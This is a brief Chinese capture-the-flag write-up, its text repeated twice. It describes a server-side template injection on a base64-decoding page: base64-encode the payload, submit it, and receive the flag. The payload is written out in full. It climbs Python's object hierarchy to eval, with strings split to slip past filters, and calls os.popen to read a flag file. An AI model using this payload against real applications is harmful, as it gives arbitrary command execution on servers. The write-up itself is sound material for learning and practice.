模板注入漏洞,在base64解码页面上,先加密payload
{{{}.__class__.__base__.__subclasses__()[103].__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort_"+"_('o"+"s').po"+"pen('cat this_is_the_fl"+"ag.txt').read()")}}
然后复制加密后的字符串到解码页面,得到flag
模板注入漏洞,在base64解码页面上,先加密payload
{{{}.__class__.__base__.__subclasses__()[103].__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort_"+"_('o"+"s').po"+"pen('cat this_is_the_fl"+"ag.txt').read()")}}
然后复制加密后的字符串到解码页面,得到flag